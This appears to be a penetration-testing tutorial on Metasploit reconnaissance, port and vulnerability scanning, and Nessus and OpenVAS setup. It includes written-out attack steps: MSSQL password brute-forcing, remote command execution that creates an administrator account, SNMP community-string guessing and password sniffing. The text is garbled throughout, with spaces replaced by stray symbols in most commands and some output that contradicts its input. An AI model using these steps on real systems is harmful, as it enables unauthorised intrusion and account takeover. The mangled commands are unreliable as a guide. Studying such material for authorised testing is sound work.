When youre programming an exploit, youll most certainly need to generate shellcode. In metasploit, payloads can be generated from the msfconsole: 1 2 3 msf(>(use(payload/windows/shell/bind_tcp msf(payload(bind_tcp)(>(generate (((

2 Information Gathering
Information gathering is the basis for successful penetration test. With information gathering you gather information about which machines that are vulnerable and which are not.

2.1 The Dradis Framework

Dradis is an open-source framework to enable effective information sharing, especially during security assessments. It is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead. Dradis is far more than just a mere note-taking application. Communicating over SSL, it can import Nmap and Nessus result files, attach files, generate reports, and can be extended to connect with external systems.

Once we install and start the server, we can open the dradis web interface on the address https://127.0.0.1:3004.

On the left side we can create a tree structure and use it to organize the information: Hosts, Subnets, Services, etc. On the right side we can add relevant information to each element.

2.2 Configuring Databases

When penetrating a target network, we have to keep track of what weve done so far. In metasploit we can save everything in a database - we can use mysql or postgresql. The following command can show you which driver is available under current metasploit: 1 2 msf&>&db_driver &&&

To use metasploit we must first start the mysql daemon, then we have to tell metasploit to use it: 1 2 msf&>&db_driver&mysql &&&

Once the driver has been loaded we must connect with the database (if the database doesnt exist already, it will be created automatically): 1 2 msf&>&db_connect&user:pass@host/msf3 &&&

To make sure that were connected correctly, we can use: 1 2 msf&>&db_status &&&

2.3 Port Scanning

We can use the db_nmap command to run a nmap scan against our targets and have the scan results stored in the database. If you also wish to import the scan results into dradis, you will have to export the scan results in XML format. If we want to create that automatically, we can pass the -oA <filename> option to nmap, which will create the three nmap outputs: XML, grepable, normal. 1 2 msf&>&nmap&+v&+sV&+oA&subnet&192.168.1.0/24 &&&

2.3.1 Importing Nmap Results into Metasploit

First we have to connect to the database: 1 2 >&db_connect&root:toor@127.0.0.1/msf3 &&

When the scan is finished, we can issue the db_import to automatically save the XML file into metasploit database: 1 2 3 4 5 6 7 8 msf&>&db_import&subnet.xml [*]&Importing&'Nmap&XML'&data [*]&Importing&host&192.168.50.1 [*]&Importing&host&192.168.50.100 [*]&Importing&host&192.168.50.101 [*]&Importing&host&192.168.50.106 [*]&Successfully&imported&/home/eleanor/subnet.xml &&&

If we dont wish to import the results into dradis, we dont have to create an XML file, so we can simply run the db_nmap omitting the output flag: 1 2 msf&>&db_nmap&+sS&+A&192.168.1.0/24 &&&

Results of the imported nmap scan can be viewed with the db_hosts and db_services commands:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

msf.>.hosts . Hosts ===== . address.........mac................name..os_name..os_flavor..os_sp..purpose..info..comments AAAAAAA.........AAA................AAAA..AAAAAAA..AAAAAAAAA..AAAAA..AAAAAAA..AAAA..AAAAAAAA 192.168.1.1....00:16:0A:13:E9:B0 192.168.1.100 192.168.1.101..00:16:6F:3A:D4:C0........Unknown....................device 192.168.1.106..08:00:27:E3:5B:D0........Unknown....................device . . . . msf.>.services . Services ======== . host............port..proto..name............state...info AAAA............AAAA..AAAAA..AAAA............AAAAA...AAAA 192.168.1.1....80....tcp....http............open 192.168.1.1....1900..tcp....upnp............closed 192.168.1.100..9091..tcp....xmltecAxmlmail..open 192.168.1.101..139...tcp....netbiosAssn.....open 192.168.1.101..445...tcp....microsoftAds....open....Microsoft.Windows.XP.microsoftAds 192.168.1.106..135...tcp....msrpc...........open....Microsoft.Windows.RPC 192.168.1.106..139...tcp....netbiosAssn.....open 192.168.1.106..445...tcp....microsoftAds....open....Microsoft.Windows.XP.microsoftAds 192.168.1.106..9876..tcp....sd..............open ...

We can also import nmap results into dradis - just choose Import, select the generated XML file.

2.3.2 Nmap: The TCP Idle Scan

The TCP Idle scan allows us to scan a target by spoofing the IP address of another host on the network. For this type of scan, we must first locate an idle host on the network that uses incremental IP IDs. Lets find out an idle host on the network: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 msf.>.use.auxiliary/scanner/ip/ipidseq msf..auxiliary(ipidseq).>.show.options . Module.options.(auxiliary/scanner/ip/ipidseq): . ...Name.......Current.Setting..Required..Description ...AAAA.......AAAAAAAAAAAAAAA..AAAAAAAA..AAAAAAAAAAA ...INTERFACE...................no........The.name.of.the.interface ...RHOSTS......................yes.......The.target.address.range.or.CIDR.identifier ...RPORT......80...............yes.......The.target.port ...SNAPLEN....65535............yes.......The.number.of.bytes.to.capture ...THREADS....1................yes.......The.number.of.concurrent.threads ...TIMEOUT....500..............yes.......The.reply.read.timeout.in.milliseconds ...

We must set the RHOSTS and its a good idea to also set the THREADS to a higher number. The THREADS specifies the number of concurrent threads scanning for an idle host.

1 2 3 4 5 6 7 8 9 10 11

msf.>.use.auxiliary/scanner/ip/ipidseq msf..auxiliary(ipidseq).>.set.RHOSTS.192.168.1.0/24 RHOSTS.=>.10.1.1.0/24 msf..auxiliary(ipidseq).>.set.THREADS.50 THREADS.=>.50 msf..auxiliary(ipidseq).>.run . [*].192.168.1.2's.IPID.sequence.class:.All.zeros [*].192.168.1.3's.IPID.sequence.class:.Incremental! [*].Auxiliary.module.execution.completed ...

We can see that the potential idle host can be 192.168.1.3. Now we can run the nmap idle scan with the -sI command line. 1 2 msf..auxiliary(ipidseq).>.nmap.UPn.UsI.192.168.1.3.192.168.1.1 ...

By using the idle host, we were able to discover a number of open ports on our target 192.168.1.1 system without sending a single packet to the system.

2.3.3 Metasploit Port Scanning

In addition to nmap, metasploit also has several port scanners built into auxiliary modules. Scanners and most other auxiliary modules use the RHOSTS option instead of RHOST. RHOSTS can take various input: IP ranges, CIDR ranges and line separated host list files. By default, all scanner modules will have the THREADS value set to 1, which means that there will be only one concurrent thread while scanning. If you want to speed up your scans, you can set this value to higher number. We can see a list of port scanning tools if we enter the search portscan command: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 msf.>.search.portscan [*].Searching.loaded.modules.for.pattern.'portscan'... . Auxiliary ========= . ...Name........................Disclosure.Date..Rank....Description ...UUUU........................UUUUUUUUUUUUUUU..UUUU....UUUUUUUUUUU ...scanner/portscan/ack.........................normal..TCP.ACK.Firewall.Scanner ...scanner/portscan/ftpbounce...................normal..FTP.Bounce.Port.Scanner ...scanner/portscan/syn.........................normal..TCP.SYN.Port.Scanner ...scanner/portscan/tcp.........................normal..TCP.Port.Scanner ...scanner/portscan/xmas........................normal..TCP."XMas".Port.Scanner . ...

Example of using a different port scanner: 1 2 3 4 5 6 7 msf.>.use.auxiliary/scanner/portscan/syn msf.auxiliary(syn).>.set.INTERFACE.wlan0 msf.auxiliary(syn).>.set.PORTS.80 msf.auxiliary(syn).>.set.RHOSTS.192.168.1.0/24 msf.auxiliary(syn).>.set.THREADS.50 msf.auxiliary(syn).>.run ...

2.4 Targeted Scanning

A targeted scan looks for a specific operating systems, services, program versions, or configurations that are known to be exploitable.

2.4.1 Hunting for SMB

Metasploit can scan a network and attempt to identify versions of Microsoft Windows using smb_version module, which is a file sharing module. 1 2 3 4 5 6 7 8 msf,>,use,scanner/smb/smb_version msf,,auxiliary(smb_version),>,set,RHOSTS,192.168.1.0/24 msf,,auxiliary(smb_version),>,set,THREADS,50 msf,,auxiliary(smb_version),>,run , [*],192.168.1.166,is,running,Windows,XP,Service,Pack,3,(language:,English), [*],Auxiliary,module,execution,completed ,,,

We have discovered a running Windows XP system without having to do a full scan of the network. This is a great way to target hosts quickly and quietly that are likely to be more vulnerable when our goal is avoid being noticed.

2.4.2 Hunting for MSSQL

With metasploit we can do the UDP footprinting of MSSQL servers. The MSSQL server uses either the 1433 TCP port or a random port - if the port is dynamically generated, it can be rather hard to figure out the MSSQL server to attack. But Microsoft uses the port 1434 UDP which allows us to pull quite a lot of information about the SQL server including what port the TCP listens on. We can use the module mssql_ping to detect the MSSQL databases. 1 2 3 4 5 msf,>,use,scanner/mssql/mssql_ping msf,auxiliary(mssql_ping),>,set,RHOSTS,192.168.1.0/24 msf,auxiliary(mssql_ping),>,set,THREADS,255 msf,auxiliary(mssql_ping),>,exploit ,,,

The scan will gather quite a lot of information, like the name of the machine and the TCP port the MSSQL is running on. From now on, we can use the scanner/mssql/mssql_login module to brute-force the password by passing the module a dictionary file. You can also use FastTrack, Medusa or Hydra to do this. 1 2 3 4 5 6 7 msf,>,use,scanner/mssql/mssql_login msf,,auxiliary(mssql_login),>,set,PASS_FILE,/pentest/exploits/fasttrack/bin/dict/wordlist.txt msf,,auxiliary(mssql_login),>,set,RHOST,192.168.1.1 msf,,auxiliary(mssql_login),>,set,THREADS,50 msf,,auxiliary(mssql_login),>,set,verbose,false msf,,auxiliary(mssql_login),>,exploit ,,,

Then we can also use the mssql_exec module to execute a certain command on the target system. We must also specify the password, which is a requirement for a successful login. 1 2 3 4 5 6 7 msf+>+use+admin/mssql/mssql_exec msf+auxiliary(mssql_exec)+>+set+RHOST+192.168.1.1 msf+auxiliary(mssql_exec)+>+set+MSSQL_PASS+password msf+auxiliary(mssql_exec)+>+set+CMD+net+user+<user>+<pass>+/ADD msf+auxiliary(mssql_exec)+>+set+CMD+net+localgroup+administrators+<user>+/ADD msf+auxiliary(mssql_exec)+>+exploit +++

With the set CMD commands we added the user <user> and added him to the administrators group. At this point we have full control over the system.

2.4.3 Hunting for SSH

If we use SSH service (port 22), we can still gather as much information from it as possible with the ssh_version module. 1 2 3 4 5 6 7 8 9 msf+>+use+scanner/ssh/ssh_version msf+auxiliary(ssh_version)+>+show+options msf+auxiliary(ssh_version)+>+set+RHOSTS+192.168.1.1T192.168.1.100 msf+auxiliary(ssh_version)+>+set+THREADS+50 msf+auxiliary(ssh_version)+>+run + [*]+192.168.1.111:22,+SSH+server+version:+SSHT2.0TOpenSSH_5.8p1+DebianT1ubuntu3 [*]+Auxiliary+module+execution+completed +++

2.4.4 Hunting for FTP

FTP is a very insecure protocol that sends everything, including usernames and passwords in clear-text. To scan our network for FTP servers, we can use the ftp_version module. 1 2 3 4 5 6 7 8 msf++auxiliary(ssh_version)+>+use+scanner/ftp/ftp_version msf++auxiliary(ftp_version)+>+set+RHOSTS+192.168.1.0/24 msf++auxiliary(ftp_version)+>+set+THREADS+50 msf++auxiliary(ftp_version)+>+run + [*]+192.168.1.1:21+FTP+Banner:+'220+FTPd+1.6\x0d\x0a' [*]+Auxiliary+module+execution+completed +++

The scanner successfully identified the FTP server at 192.168.1.1. Now lets see if this server allows anonymous logins using the ftp/anonymous module. 1 2 3 4 5 6 7 8 9 msf+>+use+scanner/ftp/anonymous msf+auxiliary(anonymous)+>+set+RHOSTS+192.168.1.0/24 msf+auxiliary(anonymous)+>+set+THREADS+50 msf+auxiliary(anonymous)+>+show+options msf+auxiliary(anonymous)+>+run + [*]+Scanned+256+of+256+hosts+(100%+complete) [*]+Auxiliary+module+execution+completed +++

We can see that the anonymous login is not possible.

2.4.5 SNMP Sweeping

With SNMP we can find a lot of information about a specific system. If Windows based devices are configured with SNMP, often times with the RO/RW community strings you can extract patch levels, services running, last reboot times, usernames on the system, routes, and various other amounts of information that is valuable to an attacker. If we can get the read/write SNMP community string for a Cisco router, we can download the routers entire configuration, modify it, and upload it back to the router. Community strings are essentially passwords used to query a device for information or to write configuration information to the device. So if we know the community string, we can get quite a lot of information from the device. The metasploit has an auxiliary module called scanner/snmp/snmp_enum that can do SNMP sweeps. A scanner/snmp/snmp_login module will try a word list of community strings against a range of IP addresses in order to find out the community string, which can allow a full compromise of the system. 1 2 3 4 5 6 7

msf+>+use+auxiliary/scanner/snmp/snmp_login msf++auxiliary(snmp_login)+>+set+RHOSTS+192.168.1.0/24 msf++auxiliary(snmp_login)+>+set+THREADS+50 msf++auxiliary(snmp_login)+>+run + [+]+SNMP:+192.168.1.2+community+string:+'public'+info:+'Linux+localhost+2.6.35V22Vgeneric+#35VUbun +++

We can see that we actually identified a host 192.168.1.2 that has SNMP enabled and since we guessed the community string (password), we also get the information about the kernel, operating system and architecture.

2.4.6 Password Sniffing

In metasploit, there is a module psnuffle, which can sniff passwords off the wire - like dsniff. It supports the following protocols: pop3, imap, ftp, HTTP GET. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 msf+>+use+auxiliary/sniffer/psnuffle msf+auxiliary(psnuffle)+>+show+options + Module+options: + +++Name+++++++Current+Setting++Required++Description +++VVVV+++++++VVVVVVVVVVVVVVV++VVVVVVVV++VVVVVVVVVVV +++FILTER++++++++++++++++++++++no++++++++The+filter+string+for+capturing+traffic +++INTERFACE+++++++++++++++++++no++++++++The+name+of+the+interface +++PCAPFILE++++++++++++++++++++no++++++++The+name+of+the+PCAP+capture+file+to+process +++PROTOCOLS++all++++++++++++++yes+++++++A+commaVdelimited+list+of+protocols+to+sniff+or+"all". +++RHOST+++++++++++++++++++++++yes+++++++The+target+address +++SNAPLEN++++65535++++++++++++yes+++++++The+number+of+bytes+to+capture +++TIMEOUT++++1++++++++++++++++yes+++++++The+number+of+seconds+to+wait+for+new+data msf+auxiliary(psnuffle)+>+set+RHOST+192.168.1.1 msf+auxiliary(psnuffle)+>+run +++

2.5 Writing Your Own TCP Scanner

Writing a scanner in metasploit is fairly easy. Some of the many metasploit scanner features are: it provides access to all exploit classes and methods support is provided for proxies, SSL, and reporting built-in threading and range scanning easy to write and run quickly Writing your own scanner is also useful during security audits. Lets write a simple TCP scanner that will connect to a host on a default port of 12345, which can be changed via module options at run time. Upon connecting to the server, it sends HELLO SERVER, receives the response and prints it out along with the IP address of the remote host. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 require0'msf/core' class0Metasploit30<0Msf::Auxiliary 00000000include0Msf::Exploit::Remote::Tcp 00000000include0Msf::Auxiliary::Scanner 00000000def0initialize 0000000000000000super( 000000000000000000000000'Name'00000000000=>0'My0custom0TCP0scan', 000000000000000000000000'Version'00000000=>0'$Revision:010$', 000000000000000000000000'Description'0000=>0'My0quick0scanner', 000000000000000000000000'Author'000000000=>0'Your0name0here', 000000000000000000000000'License'00000000=>0MSF_LICENSE 0000000000000000) 0000000000000000register_options( 000000000000000000000000[ 00000000000000000000000000000000Opt::RPORT(12345) 000000000000000000000000],0self.class) 00000000end 0 00000000def0run_host(ip) 0000000000000000connect() 00000000000000greeting0=0"HELLO0SERVER"0 00000000000000sock.puts(greeting) 0000000000000000data0=0sock.recv(1024) 0000000000000000print_status("Received:0#{data}0from0#{ip}") 0000000000000000disconnect() 00000000end end 000

Save the file into modules/auxiliary/scanner/ directory as simple_tcp.rb and load up msfconsole. Since modules are loaded at runtime, we have to restart the msfconsole to pick it up. This simple scanner uses the Msf::Exploit::Tcp to handle the TCP networking, and the Msf::Auxiliary::Scanner exposes the various settings that are required for scanners within the framework. This scanner is configured to use default port of 12345 and upon connecting to the server, it sends a message "HELLO SERVER", receives the reply from the server, and then prints it to the screen along with the server IP address. To test the module, we set up a netcat listener on port 12345 and pipe in a text file to act as the server response: 1 2 3 #0echo0"Hello0World!"0>0aaa.txt #0nc0hlvnp0123450<0aaa.txt 000

Next, we load up msfconsole, select our module, set the parameters and run it to see if it works: 1 2 3 4 msf(>(use(auxiliary/scanner/simple_tcp msf(auxiliary(simple_tcp)(>(set(RHOSTS(192.168.1.1 msf(auxiliary(simple_tcp)(>(run (((

3 Vulnerability Scanning
A vulnerability scanner is an automated program designed to look for weaknesses in computers, networks and applications. The program probes a system by sending data to it and analyzing the responses to enumerate any vulnerabilities present on the target by using its vulnerability database as reference. Its worth mentioning that a vulnerability scanner can easily be fooled by misleading banners or inconsistent configurations on the target system. Various operating systems tend to respond differently when sent particular network probes because of the different networking implementations in use. These unique responses serve as a fingerprint that the vulnerability scanner uses to determine the operating system version. With the results it obtains, the scanner represents a report outlining any vulnerabilities detected on the system. Vulnerability scanners generate a lot of traffic on a network and are easily detectable. If we want to remain stealth, we would have to check for vulnerabilities manually and not use the vulnerability scanner. Vulnerability scanning will allow you to quickly scan a target IP range looking for known vulnerabilities. Here well look at some of the vulnerability scanning capabilities that the metasploit provides.

3.1 Useful Commands

There are a lot of commands we can use when scanning the targets and saving the results in a database. Note that we must first connect to the mysql database for this commands to be meaningful. The commands are: hosts List all the hosts in the database. notes Display the notes of all the hosts in the database. The notes are valuable information that different vulnerability scanners have found. services Display the identified services on the target machines. vulns List all of the vulnerabilities stored in the database. creds List all user credentials that the vulnerability scanners have gathered.

3.2 Nexpose
NeXpose is a vulnerability scanner that scans networks to identify the devices running on them and performs checks to identify security weaknesses in operating systems and applications. The community edition of NeXpose is free, but theres also a enterprise edition available. After installing NeXpose, we can access the NeXpose via web browser at https://127.0.0.1:3780. We can login by using the credentials we created during setup. After logging in, we get to the NeXpose main page, which is presented on the picture.
NeXpose interface in a web browser.

We picture presents the following tabs in the NeXpose interface: Assets Details of computers and other devices on our network after they have been scanned. Reports Vulnerability scan reports after they have been generated. Vulnerabilities Details on discovered vulnerabilities. Administration Allows us to configure various options.

3.2.1 Scanning the Target Network

Before we can run a vulnerability scan in NeXpose, we have to configure a site, which is a logical collection of devices (subnet, collection of servers, a single host). These sites can then be scanned by NeXpose. To create a new site, click on New Site button in NeXpose home page and follow the wizard. First, we have to enter the name and description, then we have to add the target to scan, which can be a single host or a subnet.

Successfully created new site will look like the following picture. There we can also see the New Manual Scan, which we have to click to actually start the scan.

The progress bar, which is showing the completeness of the scan.

We also have to generate a report, so that we can look at the scan results after the scan completes. Click on the New Report in the Reports tab.

Enter the name of the report, and choose the NeXpose Simple XML Export, so that we will be able to import the scan results into metasploit.

On the next subsequent window, we have to add the devices we want to include in the report by clicking on Select Sites.

When clicking on Save, we have generated a new report format.

3.2.2 Nexpose in MSFConsole

We can run Nexpose on its own and import the scan results in the database that metasploit uses. But we can also run nexpose scans directly from msfconsole like this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

msf.auxiliary(crawler).>.load.nexpose . .____............._....._._____..._..._.....__..__ |.._.\.__._._.__.(_).__|.|___..|.|.\.|.|.___\.\/./_.__...___..___..___ |.|_)./._`.|.'_.\|.|/._`.|.././..|..\|.|/._.\\../|.'_.\./._.\/.__|/._.\ |.._.<.(_|.|.|_).|.|.(_|.|././...|.|\..|..__//..\|.|_).|.(_).\__.\..__/ |_|.\_\__,_|..__/|_|\__,_|/_/....|_|.\_|\___/_/\_\..__/.\___/|___/\___| ...........|_|...................................|_| . . [*].NeXpose.integration.has.been.activated [*].Successfully.loaded.plugin:.nexpose msf.auxiliary(crawler).>.help . NeXpose.Commands ================ . ....Command...................Description ....XXXXXXX...................XXXXXXXXXXX ....nexpose_activity..........Display.any.active.scan.jobs.on.the.NeXpose.instance ....nexpose_command...........Execute.a.console.command.on.the.NeXpose.instance ....nexpose_connect...........Connect.to.a.running.NeXpose.instance.(.user:pass@host[:port].) ....nexpose_disconnect........Disconnect.from.an.active.NeXpose.instance ....nexpose_discover..........Launch.a.scan.but.only.perform.host.and.minimal.service.discovery ....nexpose_dos...............Launch.a.scan.that.includes.checks.that.can.crash.services.and.devi ....nexpose_exhaustive........Launch.a.scan.covering.all.TCP.ports.and.all.authorized.safe.checks ....nexpose_report_templates..List.all.available.report.templates ....nexpose_scan..............Launch.a.NeXpose.scan.against.a.specific.IP.range.and.import.the.re ....nexpose_site_devices......List.all.discovered.devices.within.a.site ....nexpose_site_import.......Import.data.from.the.specified.site.ID ....nexpose_sites.............List.all.defined.sites ....nexpose_sysinfo...........Display.detailed.system.information.about.the.NeXpose.instance ...

Before running a scan against a target, we first need to connect to our server running NeXpose by using the nexpose_connect command. 1 2 msf.>.nexpose_connect.eleanor:eleanor@192.168.1.100 ...

Now that we are connected to our server, we can run a vulnerability scan right from within the metasploit: 1 2 msf.>.nexpose_discover.192.168.1.101 ...

After that we can run db_services and db_vulns to see the results.

3.3 Nessus
Metasploits nessus plugins lets you launch scans and pull information from nessus scans via the console, but well import nessus scan results independently.

3.3.1 Installation and Configuration

First we need to install the nessus:

1 2

#$apt(get$install$nessus $$$

Then we need to add a new user using the nessus-adduser command, which will ask us for authentication method, which can be performed by several means, but well choose password. The next question will ask us about restricting the user account. When the user account us used across an enterprise, a user can be restricted and only allowed to scan specific IP addresses. For most users, this will be left blank allowing to scan anything. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 #$nessus(adduser Using$/var/tmp$as$a$temporary$file$holder $ Add$a$new$nessusd$user (((((((((((((((((((((( $ $ Login$:$eleanor Authentication$(pass/cert)$[pass]$:$pass Login$password$: Login$password$(again)$: $ User$rules (((((((((( nessusd$has$a$rules$system$which$allows$you$to$restrict$the$hosts that$eleanor$has$the$right$to$test.$For$instance,$you$may$want him$to$be$able$to$scan$his$own$host$only. $ Please$see$the$nessus(adduser(8)$man$page$for$the$rules$syntax $ Enter$the$rules$for$this$user,$and$hit$ctrl(D$once$you$are$done$: (the$user$can$have$an$empty$rules$set) $ $ Login$$$$$$$$$$$$$:$eleanor Password$$$$$$$$$$:$*********** DN$$$$$$$$$$$$$$$$: Rules$$$$$$$$$$$$$: $ $ Is$that$ok$?$(y/n)$[y]$y user$added. $$$

Next we also need to generate a certificate with nessus-mkcert to encrypt the traffic between the client and the server. 1 2 #$nessus(mkcert $$$

We also need to register on the nessus webpage to receive an activation code. Then we just need to activate the nessus: 1 2 #$/opt/nessus/bin/nessus(fetch$((register$<registration_code> $$$

Next, we need to update the plugins. Each plugin is written to test for a specific vulnerability. These can be written to actually exploit the vulnerability or just test for known vulnerable software versions. Plugins can be written in most any language but are usually written in Nessus Attack Scripting Language (NASL). NASL is Nessus own language, specifically designed for vulnerability test writing. NASL plug-ins typically test by sending very specific code to the target and comparing the results against stored vulnerable values. There are a few built-in plug-ins that do not use NASL. These are C and Perl scripts to perform special purposes that can

not easily be done in NASL. Among these is the Services plug-in which identifies port-to-program mappings. Plug-in updates should be done frequently. New vulnerabilities are being discovered and disseminated all the time. Typically after a new vulnerability is released to the public, someone in the Nessus community writes a NASL plug-in, releases it to the public and submits it to www.nessus.org. It is then reviewed by the developers and added to the approved plug-in list. For high risk, high profile vulnerabilities a plug-in is often released the same day the vulnerability information is publicly released. To update the plugins, we need to use the nessus-update-plugins command: 1 2 #$nessus)update)plugins $$$

Okay, now we have created the user, updated all the plugins, but there really isnt a daemon to connect to. The simplest way to start a daemon is to issue the following command, which will load all the plugins that takes quite a lot of time. 1 2 #$nessus)service$)D $$$

We can see that the nessus server is listening on port 1241: 1 2 3 #$netstat$)landtp$|$grep$nessus tcp$$$$$$$$0$$$$$$0$0.0.0.0:1241$$$$$$$$$$$$0.0.0.0:*$$$$$$$$$$$$$$$LISTEN$$$$$$26114/nessusd $$$

In order to connect to the daemon, we must use a client. There are three clients that we can use: Native Unix GUI This is installed at server install time. Just run the NessusClient command and the GUI will start. Command Line Client We need to install a separate program nessuscmd. NessusWX This is for Windows users only If we start native unix nessus client GUI, it will look something like that:
Native Unix Nessus Client

We should login with the previously created username. The connection between the client and server will be encrypted.

3.3.2 Using Nessus

The most powerful feature of nessus is its plugins. The choice of plugins is critical to the success of a scan most plugins are written very well and rarely trigger false positives or negatives, but a few are not.
Main nessus GUI interface

3.3.2.1 Safe Plugins

Some plugins are categorized under "Denial of Service" category. These plugins will actually perform a DOS attack and crash systems that have these problems - they shouldnt be blindly run on production systems. They wont cause long term damage, but at least reboot will be required. Its always a good idea to enable Safe-Checks. Safe-checks disable the dangerous parts of safe-check compatible plugins and causes them to not actually cause damage to the target, but gut collect version numbers from banners. Safe-checks might cause false positives or false negatives. The valuable trade off is that they should not crash a machine.
Enable the safe-checks.

On the attached picture we can also see a bunch of other options, like the number of hosts to test at the same time. This is useful when a range of hosts to scan is given. And number of checks to perform at the same time, which means the number of plugins being applied to the victim at the same time. We can also choose how well do the port scan, via nessus SYN/TCP/SNMP scanner, or via some other scanning techniques. To perform a simply noisy scan on a non-production system, enabling all plugins is the best choice. If you know that youre be targeting Windows machine, then you can deselect most of the plugins.
3.3.2.2 Port Scanning

Port scanning identifies the active ports for the victim host. Since each port is tied to a specific application, nessus only runs the appropriate tests for only that port/application. Since often ports are changed from their default port numbers to hide them, nessus has a plugin services, which attempt to identify the program running on each port. Once the program is identified, only the appropriate plugins are run against it. Nessus has several port scanning techniques. Theres a built in wrapper for nmap, but theres also an internal scanner and a custom ping scan. Port scanning is very dependent on the situation. For a simple scan, the internal SYN scan using the default parameters with pings is sufficient.
3.3.2.3 Identify and Scan Targets

The final task is to identify targets. The target can be a single IP address or an IP range.

Then we just have to Execute the scan and wait for the results. After the scan is complete, we can see the output in the Results tab. There we can find found vulnerabilities and severity levels.

3.3.3 Importing Results Into the Metasploit

Lets import our results into the metasploit. First, we must download the report and save results to the hard drive. It will be saved with the .nbe extension. This can be imported in the metasploit. Start msfconsole and imports the results using db_import command followed by the filename: 1 2 3 msf'>'db_connect'root:toor@127.0.0.1/msf3 msf'>'db_import'report.nbe '''

To verify that the scanned host and vulnerability data was imported properly, check with db_hosts. The following command will print the target IP address, number of services detected and number of vulnerabilities found by nessus: 1 2 msf'>'hosts';c'address,svcs,vulns '''

3.3.4 Scanning With Nessus From Metasploit

If we want to use nessus directly from the metasploit, we need to use the nessus plugin: 1 2 3 4 5 6 7 8 msf'>'load'nessus [*]'Nessus'Bridge'for'Metasploit'1.1 [+]'Type'nessus_help'for'a'command'listing [*]'Creating'Exploit'Search'Index';'(/root/.msf4/nessus_index)';'this'wont'take'long. [*] [*]'It'has'taken':'6.697966'seconds'to'build'the'exploits'search'index [*]'Successfully'loaded'plugin:'nessus '''

The nessus_help will list all the commands that nessus plugin supports. Before starting a scan, we must first authenticate to the nessus server using the nessus_connect: 1 2 3 4 msf(>(nessus_connect(root:toor@127.0.0.1:8834(ok [*](Connecting(to(https://127.0.0.1:8834/(as(root [*](Authenticated (((

Then list the available policies: 1 2 3 4 5 6 7 8 9 10 msf(>(nessus_policy_list [+](Nessus(Policy(List ( ID((Name((((((((((((((((((((((((Comments PP((PPPP((((((((((((((((((((((((PPPPPPPP P4((External(Network(Scan P3((Internal(Network(Scan P2((Web(App(Tests P1((Prepare(for(PCI(DSS(audits (((

We need to choose the policy we would like to use for the scan, then launch a new scan with nessus_scan_new followed by the policy number, name for the scan, and target IP: 1 2 msf(>(nessus_scan_new(P4(mynetwork(192.168.1.191 (((

While the scan is in progress, we can see the status by running the nessus_scan_status: 1 2 3 4 5 6 7

msf(>(nessus_scan_status [+](Running(Scans ( Scan(ID(((((((((((((((((((((((((((((((((((((((((((((((Name(((((((Owner((((Started((((((((((((Statu PPPPPPP(((((((((((((((((((((((((((((((((((((((((((((((PPPP(((((((PPPPP((((PPPPPPP((((((((((((PPPPP c0fcef66P281bP4e84P532aP619510eb001ec2b9ad43c1350738((mynetwork((root(((((22:44(Oct(12(2011((runni (((

After the scan has completed, we can list the available scan reports with the nessus_report_list. If we would like to import the report into the metasploit, we need to identify the ID of the report and enter nessus_report_get followed by the report ID. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 msf(>(nessus_report_list [+](Nessus(Report(List ( ID((((((((((((((((((((((((((((((((((((((((((((((((((((Name(((((((Status(((((Date PP((((((((((((((((((((((((((((((((((((((((((((((((((((PPPP(((((((PPPPPP(((((PPPP c0fcef66P281bP4e84P532aP619510eb001ec2b9ad43c1350738((mynetwork((completed((23:08(Oct(12(2011 ( [*](You(can: [*](((((((((Get(a(list(of(hosts(from(the(report:((((((((((nessus_report_hosts(<report(id> ( ( msf(>(nessus_report_get(c0fcef66P281bP4e84P532aP619510eb001ec2b9ad43c1350738 [*](importing(c0fcef66P281bP4e84P532aP619510eb001ec2b9ad43c1350738 [*](192.168.1.191(((Done! [+](Done (((

3.4 OpenVas

3.4.1 Gentoo Linux

OpenVas is a vulnerability assessment system just like nessus. First we have to install it: 1 2 #$apt(get$install$openvas $$$

Next, we have to add a user and create a certificate, much the same way as with nessus: 1 2 3 #$openvas(adduser #$openvas(mkcert $$$

To update to the latest NVTs (in nessus they are called plugins) from openvas database run: 1 2 #$openvas(nvt(sync $$$

Start the OpenVas daemon: 1 2 #$openvasd $$$

We can see that the daemon is running on port 9390: 1 2 3 #$netstat$(landtp$|$grep$openvas tcp$$$$$$$$0$$$$$$0$0.0.0.0:9390$$$$$$$$$$$$0.0.0.0:*$$$$$$$$$$$$$$$LISTEN$$$$$$12306/openvasd $$$

Then start the openvas client, which is essentially the same as nessus client, except that its connecting to a different port and using different plugins/NVTs: 1 2 #$OpenVAS(Client $$$

3.4.2 Backtrack Linux

First choose the following from the Menu: OpenVas Adduser: add a new user OpenVas Mkcert: create a certificate OpenVas NVT Sync: sync the plugins OpenVas Check Setup: check if everything was setup correctly OpenVas Scanner: this will load all the plugins Console:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

;,generate,a,client,certificate #,openvas<mkcert<client,<n,om,<i , ;,rebuild,the,NVT,database #,openvasmd,<<rebuild , ;,set,openvas,administrator #,openvasad,<c,'add_user',<n,admin,<r,Admin , ;,start,openvas,manager #,openvasmd,<a,127.0.0.1,<p,9390 , ;,start,openvas,administrator #,openvasad,<a,127.0.0.1,<p,9393 , ;,start,greenbone,security,assistant #,gsad,<<http<only,<<listen=127.0.0.1,<p,9392 ,,,,,

Now open a web browser and type http://127.0.0.1:9392/. The login screen will look like the following picture.

Main Greenbone security assistant web page.

Theres also another client, the Greenbone Security Desktop:

3.4.3 Administration
On the left side we have a bunch of links. If we click on the NVT Feed, we can update the NVT database.

3.4.4 Configuration
Lets start with scan configurations. Openvas comes with five template configurations, each of which does something special.

We can create our own scan config, if we want to customize it. We are presented with a bunch of options that we can customize. This can be very helpful, so that were not throwing a lot of futile windows checks at a linux server and the other way around.

